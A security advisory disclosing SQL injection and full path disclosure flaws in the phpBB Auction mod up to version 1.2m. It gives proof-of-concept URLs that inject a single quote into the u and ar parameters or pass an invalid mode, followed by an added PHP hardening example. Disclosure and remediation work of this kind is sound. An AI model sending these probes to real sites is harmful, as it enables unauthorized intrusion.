sNKenjoi's Security Advisory: [ZH2005-12SA] SQL Injection & Full Path Disclosure in phpBB Auction

Security Advisory: SQL Injection & Full Path Disclosure in phpBB Auction

Severity: High
Title: SQL Injection & Full Path Disclosure in phpBB Auction

Versions
  phpBB: Any Version
  Auction Mod: Version 1.2m (and below)

Vendor: phpBB-Auction
Vendor Website: http://www.phpbb-auction.com/

Proof of Concept Exploits:

SQL Injection (Full Path Disclosure also works sometimes)
  http://localhost/auction_rating.php?mode=view&u='
  http://localhost/auction_offer.php?mode=add&ar='

Full Path Disclosure
  http://localhost/auction_myauctions.php?mode=f00b4r

(For some you will have to be logged in.)

snkenjoi.com & zone-h.org
snkenjoi@gmail.com

(Original URL: snkenjoi.com/secadv/secadv9.txt)
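Both issues come from unvalidated query parameters reaching SQL and from PHP error output reaching the browser. The following is an added hardening example written for this advisory, not code from the Auction mod or phpBB; it assumes `u` and `ar` are numeric ids and that `view` is the legitimate mode for auction_rating.php (the mod's real mode names and query code are assumptions here).

```php
<?php
// Added example, not the Auction mod's own code. Included at the top of each
// auction_*.php entry point before any database access.

// Full Path Disclosure is a consequence of PHP warnings/notices being echoed to
// the client; log them server-side instead of displaying them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Returns the parameter as an int, or aborts. ctype_digit rejects anything that
// is not a plain non-negative integer, so a quote character (as in the
// advisory's u=' and ar=' requests) never reaches the SQL string.
function auction_int_param(string $name): int
{
    if (!isset($_GET[$name]) || !ctype_digit((string) $_GET[$name])) {
        http_response_code(400);
        exit('Invalid request.');
    }
    return (int) $_GET[$name];
}

// Restricts mode to an explicit allow-list. An unknown mode such as the
// advisory's mode=f00b4r ends in a controlled 404 rather than falling through
// to a code path that emits a notice containing the script's filesystem path.
function auction_mode_param(array $allowed): string
{
    $mode = $_GET['mode'] ?? '';
    if (!in_array($mode, $allowed, true)) {
        http_response_code(404);
        exit('Unknown mode.');
    }
    return $mode;
}

// Usage as auction_rating.php would call it (allow-list and column name are
// assumptions, not taken from the mod):
$mode    = auction_mode_param(['view']);
$user_id = auction_int_param('u');

// The id is now a PHP integer, so interpolating it with %d cannot change the
// query's structure. Prepared statements are preferable where the DB layer
// supports them.
$sql = sprintf('SELECT * FROM auction_rating WHERE user_id = %d', $user_id);
```

The same pattern applies to auction_offer.php with `auction_int_param('ar')` and to auction_myauctions.php with that script's own mode list.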